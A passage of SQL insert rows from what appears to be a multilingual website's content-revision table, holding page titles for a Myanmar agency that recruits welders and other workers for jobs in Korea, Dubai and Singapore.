(17, 119, 'en', 1, 1, 'ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍  အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်', 1688194656, 1688195504, 0, 0, 1, NULL, 'und', 0),
(17, 119, 'ja', 1, 2, 'ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍  အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်', 1688388699, 1688388704, 0, 0, 0, 1, 'en', 0),
(17, 120, 'en', 1, 1, 'ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍  အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်', 1688194656, 1688195504, 0, 0, 1, NULL, 'und', 0),
(17, 120, 'ja', 1, 2, 'ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍  အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်', 1688388699, 1688388704, 0, 0, 0, NULL, 'en', 0),
(17, 120, 'ko', 1, 2, 'ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍  အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်', 1688388710, 1688388714, 0, 0, 0, 1, 'en', 0),
(9, 121, 'en', 1, 1, 'ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍  အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးစဉ်', 1687241497, 1688199484, 0, 0, 1, NULL, 'und', 0),
(9, 121, 'ja', 1, 2, 'ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍  အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးစဉ်', 1688388729, 1688388733, 0, 0, 0, 1, 'en', 0),
(9, 122, 'en', 1, 1, 'ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍  အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးစဉ်', 1687241497, 1688199484, 0, 0, 1, NULL, 'und', 0),
(9, 122, 'ja', 1, 2, 'ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍  အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးစဉ်', 1688388729, 1688388733, 0, 0, 0, NULL, 'en', 0),
(9, 122, 'ko', 1, 2, 'ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍  အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးစဉ်', 1688388738, 1688388741, 0, 0, 0, 1, 'en', 0),
(20, 123, 'en', 1, 1, 'Memorial Photo of 2nd Batch Welding Students', 1688204366, 1688377233, 0, 0, 1, NULL, 'und', 0),
(20, 123, 'ja', 1, 2, 'Memorial Photo of 2nd Batch Welding Students', 1688388745, 1688388756, 0, 0, 0, 1, 'en', 0),
(20, 124, 'en', 1, 1, 'Memorial Photo of 2nd Batch Welding Students', 1688204366, 1688377233, 0, 0, 1, NULL, 'und', 0),
(20, 124, 'ja', 1, 2, 'Memorial Photo of 2nd Batch Welding Students', 1688388745, 1688388756, 0, 0, 0, NULL, 'en', 0),
(20, 124, 'ko', 1, 2, 'Memorial Photo of 2nd Batch Welding Students', 1688388761, 1688388764, 0, 0, 0, 1, 'en', 0),
(19, 125, 'en', 1, 1, 'Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa', 1688200678, 1688377651, 0, 0, 1, NULL, 'und', 0),
(19, 125, 'ja', 1, 2, 'Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa', 1688388770, 1688388773, 0, 0, 0, 1, 'en', 0),
(19, 126, 'en', 1, 1, 'Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa', 1688200678, 1688377651, 0, 0, 1, NULL, 'und', 0),
(19, 126, 'ja', 1, 2, 'Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa', 1688388770, 1688388773, 0, 0, 0, NULL, 'en', 0),
(19, 126, 'ko', 1, 2, 'Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa', 1688388781, 1688388791, 0, 0, 0, 1, 'en', 0),
(10, 127, 'en', 1, 1, 'Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.', 1687265813, 1688361721, 0, 0, 1, NULL, 'und', 0),
(10, 127, 'ja', 1, 2, 'Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.', 1688388899, 1688388903, 0, 0, 0, 1, 'en', 0),
(18, 128, 'en', 1, 1, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688195851, 1688362772, 0, 0, 1, NULL, 'und', 0),
(18, 128, 'ja', 1, 2, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688388901, 1688388906, 0, 0, 0, 1, 'en', 0),
(10, 129, 'en', 1, 1, 'Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.', 1687265813, 1688361721, 0, 0, 1, NULL, 'und', 0),
(10, 129, 'ja', 1, 2, 'Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.', 1688388899, 1688388903, 0, 0, 0, NULL, 'en', 0),
(10, 129, 'ko', 1, 2, 'Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.', 1688388912, 1688388916, 0, 0, 0, 1, 'en', 0),
(18, 130, 'en', 1, 1, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688195851, 1688362772, 0, 0, 1, NULL, 'und', 0),
(18, 130, 'ja', 1, 2, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688388901, 1688388906, 0, 0, 0, NULL, 'en', 0),
(18, 130, 'ko', 1, 2, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688388914, 1688388919, 0, 0, 0, 1, 'en', 0),
(4, 131, 'en', 1, 1, 'Wanted Desperately', 1687238298, 1688363483, 0, 0, 1, NULL, 'und', 0),
(4, 131, 'ja', 1, 2, 'Wanted Desperately', 1688388939, 1688388945, 0, 0, 0, 1, 'en', 0),
(5, 132, 'en', 1, 1, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1687238451, 1688365096, 0, 0, 1, NULL, 'und', 0),
(5, 132, 'ja', 1, 2, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1688388941, 1688388947, 0, 0, 0, 1, 'en', 0),
(3, 133, 'en', 1, 1, 'Who should attend E 7-3 Welding Class?', 1687238109, 1688376827, 0, 0, 1, NULL, 'und', 0),
(3, 133, 'ja', 1, 2, 'Who should attend E 7-3 Welding Class?', 1688388943, 1688388949, 0, 0, 0, 1, 'en', 0),
(4, 134, 'en', 1, 1, 'Wanted Desperately', 1687238298, 1688363483, 0, 0, 1, NULL, 'und', 0),
(4, 134, 'ja', 1, 2, 'Wanted Desperately', 1688388939, 1688388945, 0, 0, 0, NULL, 'en', 0),
(4, 134, 'ko', 1, 2, 'Wanted Desperately', 1688388956, 1688388963, 0, 0, 0, 1, 'en', 0),
(5, 135, 'en', 1, 1, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1687238451, 1688365096, 0, 0, 1, NULL, 'und', 0),
(5, 135, 'ja', 1, 2, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1688388941, 1688388947, 0, 0, 0, NULL, 'en', 0),
(5, 135, 'ko', 1, 2, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1688388958, 1688388965, 0, 0, 0, 1, 'en', 0),
(3, 136, 'en', 1, 1, 'Who should attend E 7-3 Welding Class?', 1687238109, 1688376827, 0, 0, 1, NULL, 'und', 0),
(3, 136, 'ja', 1, 2, 'Who should attend E 7-3 Welding Class?', 1688388943, 1688388949, 0, 0, 0, NULL, 'en', 0),
(3, 136, 'ko', 1, 2, 'Who should attend E 7-3 Welding Class?', 1688388959, 1688388967, 0, 0, 0, 1, 'en', 0),
(24, 137, 'en', 1, 2, 'Our Services', 1688384288, 1688384298, 0, 0, 1, NULL, 'und', 0),
(24, 137, 'ja', 1, 2, 'Our Services', 1688384311, 1688384315, 0, 0, 0, NULL, 'en', 0),
(24, 137, 'ko', 1, 2, 'Our Services', 1688432702, 1688432705, 0, 0, 0, 1, 'en', 0),
(23, 138, 'en', 1, 2, 'Company Profile', 1688384143, 1688384170, 0, 0, 1, NULL, 'und', 0),
(23, 138, 'ja', 1, 2, 'Company Profile', 1688384224, 1688384708, 0, 0, 0, NULL, 'en', 0),
(23, 138, 'ko', 1, 2, 'Company Profile', 1688384243, 1688458194, 0, 0, 0, 1, 'en', 0),
(24, 139, 'en', 1, 2, 'Our Services', 1688384288, 1688458321, 0, 0, 1, 1, 'und', 0),
(24, 139, 'ja', 1, 2, 'Our Services', 1688384311, 1688384315, 0, 0, 0, NULL, 'en', 0),
(24, 139, 'ko', 1, 2, 'Our Services', 1688432702, 1688432705, 0, 0, 0, NULL, 'en', 0),
(25, 140, 'en', 1, 2, 'Mission & Vision', 1688384376, 1688384384, 0, 0, 1, NULL, 'und', 0),
(25, 140, 'ja', 1, 2, 'Mission & Vision', 1688384401, 1688384403, 0, 0, 0, NULL, 'en', 0),
(25, 140, 'ko', 1, 2, 'Mission & Vision', 1688384459, 1688458331, 0, 0, 0, 1, 'en', 0),
(24, 141, 'en', 1, 2, 'Our Services', 1688384288, 1688458367, 0, 0, 1, NULL, 'und', 0),
(24, 141, 'ja', 1, 2, 'Our Services', 1688384311, 1688384315, 0, 0, 0, NULL, 'en', 0),
(24, 141, 'ko', 1, 2, 'Our Services', 1688432702, 1688432705, 0, 0, 0, NULL, 'en', 0),
(26, 142, 'en', 1, 2, 'Future Goal', 1688384477, 1688458583, 0, 0, 1, 1, 'und', 0),
(26, 142, 'ja', 1, 2, 'Future Goal', 1688384504, 1688384515, 0, 0, 0, NULL, 'en', 0),
(26, 142, 'ko', 1, 2, 'Future Goal', 1688384529, 1688384543, 0, 0, 0, NULL, 'en', 0),
(23, 143, 'en', 1, 2, 'Company Profile', 1688384143, 1688384170, 0, 0, 1, NULL, 'und', 0),
(23, 143, 'ja', 1, 2, 'Company Profile', 1688384224, 1688384708, 0, 0, 0, NULL, 'en', 0),
(23, 143, 'ko', 1, 2, 'Company Profile', 1688384243, 1688458648, 0, 0, 0, 1, 'en', 0),
(1, 144, 'en', 1, 1, 'About Us', 1687235565, 1688376966, 0, 0, 1, NULL, 'und', 0),
(1, 144, 'ja', 1, 2, 'About Us', 1688382532, 1688382686, 0, 0, 0, NULL, 'en', 0),
(1, 144, 'ko', 1, 2, 'About Us', 1688382695, 1688458884, 0, 0, 0, 1, 'en', 0),
(1, 145, 'en', 1, 1, 'About Us', 1687235565, 1688458973, 0, 0, 1, 1, 'und', 0),
(1, 145, 'ja', 1, 2, 'About Us', 1688382532, 1688382686, 0, 0, 0, NULL, 'en', 0),
(1, 145, 'ko', 1, 2, 'About Us', 1688382695, 1688458884, 0, 0, 0, NULL, 'en', 0),
(25, 146, 'en', 1, 2, 'Mission & Vision', 1688384376, 1688459987, 0, 0, 1, 1, 'und', 0),
(25, 146, 'ja', 1, 2, 'Mission & Vision', 1688384401, 1688384403, 0, 0, 0, NULL, 'en', 0),
(25, 146, 'ko', 1, 2, 'Mission & Vision', 1688384459, 1688458331, 0, 0, 0, NULL, 'en', 0),
(1, 147, 'en', 1, 1, 'About Us', 1687235565, 1688460034, 0, 0, 1, 1, 'und', 0),
(1, 147, 'ja', 1, 2, 'About Us', 1688382532, 1688382686, 0, 0, 0, NULL, 'en', 0),
(1, 147, 'ko', 1, 2, 'About Us', 1688382695, 1688458884, 0, 0, 0, NULL, 'en', 0),
(17, 148, 'en', 1, 1, 'The first batch of welding trainees from NEW COMET TRADING AGENCY CO.,LTD from Sinmalai Shipyard was met by the Deputy Minister of the Ministry of Transport and Communications and gave speeches and inspected the training school.', 1688194656, 1688546048, 0, 0, 1, 1, 'und', 0),
(17, 148, 'ja', 1, 2, 'ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍  အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်', 1688388699, 1688388704, 0, 0, 0, NULL, 'en', 0),
(17, 148, 'ko', 1, 2, 'ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍  အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်', 1688388710, 1688388714, 0, 0, 0, NULL, 'en', 0),
(17, 149, 'en', 1, 1, 'The first batch of welding trainees from NEW COMET TRADING AGENCY CO.,LTD from Sinmalai Shipyard was met by the Deputy Minister of the Ministry of Transport and Communications and gave speeches and inspected the training school.', 1688194656, 1688546090, 0, 0, 1, 1, 'und', 0),
(17, 149, 'ja', 1, 2, 'ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍  အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်', 1688388699, 1688388704, 0, 0, 0, NULL, 'en', 0),
(17, 149, 'ko', 1, 2, 'ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍  အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်', 1688388710, 1688388714, 0, 0, 0, NULL, 'en', 0),
(9, 150, 'en', 1, 1, 'The first batch of welding trainees from NEW COMET TRADING AGENCY CO.,LTD from Sinmalike Shipyard was met by the Deputy Minister of the Ministry of Transport and Communications and gave speeches and inspected the training school.', 1687241497, 1688546162, 0, 0, 1, 1, 'und', 0),
(9, 150, 'ja', 1, 2, 'ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍  အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးစဉ်', 1688388729, 1688388733, 0, 0, 0, NULL, 'en', 0),
(9, 150, 'ko', 1, 2, 'ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍  အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးစဉ်', 1688388738, 1688388741, 0, 0, 0, NULL, 'en', 0),
(6, 151, 'en', 1, 1, 'In order to get employed to the shipyard in Korea with an E7-3 Visa, the trainees are explained what is needed to quickly come and check the welding exam.', 1687240083, 1688546491, 0, 0, 1, 1, 'und', 0),
(6, 151, 'ja', 1, 2, 'ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား', 1688388644, 1688388648, 0, 0, 0, NULL, 'en', 0),
(6, 151, 'ko', 1, 2, 'ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား', 1688388653, 1688388655, 0, 0, 0, NULL, 'en', 0),
(8, 152, 'en', 1, 1, 'Wanted people who want to work as a Welder (expert welding technician) in Korea Shipyard.', 1687240986, 1688546702, 0, 0, 1, 1, 'und', 0),
(8, 152, 'ja', 1, 2, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင် ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1688388288, 1688388291, 0, 0, 0, NULL, 'en', 0),
(8, 152, 'ko', 1, 2, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင် ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1688388296, 1688388422, 0, 0, 0, NULL, 'en', 0),
(7, 153, 'en', 1, 1, 'E-7 visa - A special Ability visa for Foreign Nationals.', 1687240759, 1688546973, 0, 0, 1, 1, 'und', 0),
(7, 153, 'ja', 1, 2, 'E-7 visa -နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။', 1688388674, 1688388678, 0, 0, 0, NULL, 'en', 0),
(7, 153, 'ko', 1, 2, 'E-7 visa -နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။', 1688388683, 1688388689, 0, 0, 0, NULL, 'en', 0),
(7, 154, 'en', 1, 1, 'E-7 visa - A special Ability visa for Foreign Nationals.', 1687240759, 1688547023, 0, 0, 1, 1, 'und', 0),
(7, 154, 'ja', 1, 2, 'E-7 visa -နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။', 1688388674, 1688388678, 0, 0, 0, NULL, 'en', 0),
(7, 154, 'ko', 1, 2, 'E-7 visa -နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။', 1688388683, 1688388689, 0, 0, 0, NULL, 'en', 0),
(1, 155, 'en', 1, 1, 'About Us', 1687235565, 1688633594, 0, 0, 1, 1, 'und', 0),
(1, 155, 'ja', 1, 2, 'About Us', 1688382532, 1688382686, 0, 0, 0, NULL, 'en', 0),
(1, 155, 'ko', 1, 2, 'About Us', 1688382695, 1688458884, 0, 0, 0, NULL, 'en', 0),
(23, 156, 'en', 1, 2, 'Company Profile', 1688384143, 1688633615, 0, 0, 1, 1, 'und', 0),
(23, 156, 'ja', 1, 2, 'Company Profile', 1688384224, 1688384708, 0, 0, 0, NULL, 'en', 0),
(23, 156, 'ko', 1, 2, 'Company Profile', 1688384243, 1688458648, 0, 0, 0, NULL, 'en', 0),
(23, 157, 'en', 1, 2, 'Company Profile', 1688384143, 1688633615, 0, 0, 1, NULL, 'und', 0),
(23, 157, 'ja', 1, 2, 'Company Profile', 1688384224, 1688958287, 0, 0, 0, 1, 'en', 0),
(23, 157, 'ko', 1, 2, 'Company Profile', 1688384243, 1688458648, 0, 0, 0, NULL, 'en', 0),
(24, 158, 'en', 1, 2, 'Our Services', 1688384288, 1688458367, 0, 0, 1, NULL, 'und', 0),
(24, 158, 'ja', 1, 2, 'Our Services', 1688384311, 1688958958, 0, 0, 0, 1, 'en', 0),
(24, 158, 'ko', 1, 2, 'Our Services', 1688432702, 1688432705, 0, 0, 0, NULL, 'en', 0),
(27, 159, 'en', 1, 2, 'Company History', 1688384566, 1689142571, 0, 0, 1, 1, 'und', 0),
(27, 159, 'ja', 1, 2, 'Company History', 1688384583, 1688384590, 0, 0, 0, NULL, 'en', 0),
(27, 159, 'ko', 1, 2, 'Company History', 1688384601, 1688384605, 0, 0, 0, NULL, 'en', 0),
(23, 160, 'en', 1, 2, 'Company Profile', 1688384143, 1689329431, 0, 0, 1, 1, 'und', 0),
(23, 160, 'ja', 1, 2, 'Company Profile', 1688384224, 1688958287, 0, 0, 0, NULL, 'en', 0),
(23, 160, 'ko', 1, 2, 'Company Profile', 1688384243, 1688458648, 0, 0, 0, NULL, 'en', 0),
(1, 161, 'en', 1, 1, 'About Us', 1687235565, 1688633594, 0, 0, 1, NULL, 'und', 0),
(1, 161, 'ja', 1, 2, 'About Us', 1688382532, 1689329551, 0, 0, 0, 1, 'en', 0),
(1, 161, 'ko', 1, 2, 'About Us', 1688382695, 1688458884, 0, 0, 0, NULL, 'en', 0),
(25, 162, 'en', 1, 2, 'Mission & Vision', 1688384376, 1688459987, 0, 0, 1, NULL, 'und', 0),
(25, 162, 'ja', 1, 2, 'Mission & Vision', 1688384401, 1689329626, 0, 0, 0, 1, 'en', 0),
(25, 162, 'ko', 1, 2, 'Mission & Vision', 1688384459, 1688458331, 0, 0, 0, NULL, 'en', 0),
(26, 163, 'en', 1, 2, 'Future Goal', 1688384477, 1688458583, 0, 0, 1, NULL, 'und', 0),
(26, 163, 'ja', 1, 2, '会社の目標', 1688384504, 1689329687, 0, 0, 0, 1, 'en', 0),
(26, 163, 'ko', 1, 2, 'Future Goal', 1688384529, 1688384543, 0, 0, 0, NULL, 'en', 0),
(26, 164, 'en', 1, 2, 'Future Goal', 1688384477, 1688458583, 0, 0, 1, NULL, 'und', 0),
(26, 164, 'ja', 1, 2, 'Future Goal', 1688384504, 1689329715, 0, 0, 0, 1, 'en', 0),
(26, 164, 'ko', 1, 2, 'Future Goal', 1688384529, 1688384543, 0, 0, 0, NULL, 'en', 0),
(23, 165, 'en', 1, 2, 'Company Profile', 1688384143, 1689329431, 0, 0, 1, NULL, 'und', 0),
(23, 165, 'ja', 1, 2, 'Company Profile', 1688384224, 1688958287, 0, 0, 0, NULL, 'en', 0),
(23, 165, 'ko', 1, 2, 'Company Profile', 1688384243, 1689329824, 0, 0, 0, 1, 'en', 0),
(24, 166, 'en', 1, 2, 'Our Services', 1688384288, 1688458367, 0, 0, 1, NULL, 'und', 0),
(24, 166, 'ja', 1, 2, 'Our Services', 1688384311, 1688958958, 0, 0, 0, NULL, 'en', 0),
(24, 166, 'ko', 1, 2, 'Our Services', 1688432702, 1689391666, 0, 0, 0, 1, 'en', 0),
(25, 167, 'en', 1, 2, 'Mission & Vision', 1688384376, 1688459987, 0, 0, 1, NULL, 'und', 0),
(25, 167, 'ja', 1, 2, 'Mission & Vision', 1688384401, 1689329626, 0, 0, 0, NULL, 'en', 0),
(25, 167, 'ko', 1, 2, 'Mission & Vision', 1688384459, 1689391732, 0, 0, 0, 1, 'en', 0),
(26, 168, 'en', 1, 2, 'Future Goal', 1688384477, 1688458583, 0, 0, 1, NULL, 'und', 0),
(26, 168, 'ja', 1, 2, 'Future Goal', 1688384504, 1689329715, 0, 0, 0, NULL, 'en', 0),
(26, 168, 'ko', 1, 2, 'Future Goal', 1688384529, 1689391811, 0, 0, 0, 1, 'en', 0),
(26, 169, 'en', 1, 2, 'Future Goal', 1688384477, 1688458583, 0, 0, 1, NULL, 'und', 0),
(26, 169, 'ja', 1, 2, 'Future Goal', 1688384504, 1689329715, 0, 0, 0, NULL, 'en', 0),
(26, 169, 'ko', 1, 2, 'Future Goal', 1688384529, 1689391844, 0, 0, 0, 1, 'en', 0),
(1, 170, 'en', 1, 1, 'About Us', 1687235565, 1689413814, 0, 0, 1, 1, 'und', 0),
(1, 170, 'ja', 1, 2, 'About Us', 1688382532, 1689329551, 0, 0, 0, NULL, 'en', 0),
(1, 170, 'ko', 1, 2, 'About Us', 1688382695, 1688458884, 0, 0, 0, NULL, 'en', 0),
(23, 171, 'en', 1, 2, 'Company Profile', 1688384143, 1689329431, 0, 0, 1, NULL, 'und', 0),
(23, 171, 'ja', 1, 2, '会社情報', 1688384224, 1689414271, 0, 0, 0, 1, 'en', 0),
(23, 171, 'ko', 1, 2, 'Company Profile', 1688384243, 1689329824, 0, 0, 0, NULL, 'en', 0),
(23, 172, 'en', 1, 2, 'Company Profile', 1688384143, 1689329431, 0, 0, 1, NULL, 'und', 0),
(23, 172, 'ja', 1, 2, '会社情報', 1688384224, 1689414307, 0, 0, 0, NULL, 'en', 0),
(23, 172, 'ko', 1, 2, 'Company Profile', 1688384243, 1689329824, 0, 0, 0, NULL, 'en', 0),
(25, 173, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1689649528, 0, 0, 1, 1, 'und', 0),
(25, 173, 'ja', 1, 2, 'Mission & Vision', 1688384401, 1689329626, 0, 0, 0, NULL, 'en', 0),
(25, 173, 'ko', 1, 2, 'Mission & Vision', 1688384459, 1689391732, 0, 0, 0, NULL, 'en', 0),
(26, 174, 'en', 1, 2, 'Future Goal', 1688384477, 1689649658, 0, 0, 1, 1, 'und', 0),
(26, 174, 'ja', 1, 2, 'Future Goal', 1688384504, 1689329715, 0, 0, 0, NULL, 'en', 0),
(26, 174, 'ko', 1, 2, 'Future Goal', 1688384529, 1689391844, 0, 0, 0, NULL, 'en', 0),
(27, 175, 'en', 1, 2, 'Company History', 1688384566, 1689650226, 0, 0, 1, 1, 'und', 0),
(27, 175, 'ja', 1, 2, 'Company History', 1688384583, 1688384590, 0, 0, 0, NULL, 'en', 0),
(27, 175, 'ko', 1, 2, 'Company History', 1688384601, 1688384605, 0, 0, 0, NULL, 'en', 0),
(25, 176, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1689649528, 0, 0, 1, NULL, 'und', 0),
(25, 176, 'ja', 1, 2, 'Vision & Mission ', 1688384401, 1689650477, 0, 0, 0, 1, 'en', 0),
(25, 176, 'ko', 1, 2, 'Mission & Vision', 1688384459, 1689391732, 0, 0, 0, NULL, 'en', 0),
(26, 177, 'en', 1, 2, 'Future Goal', 1688384477, 1689649658, 0, 0, 1, NULL, 'und', 0),
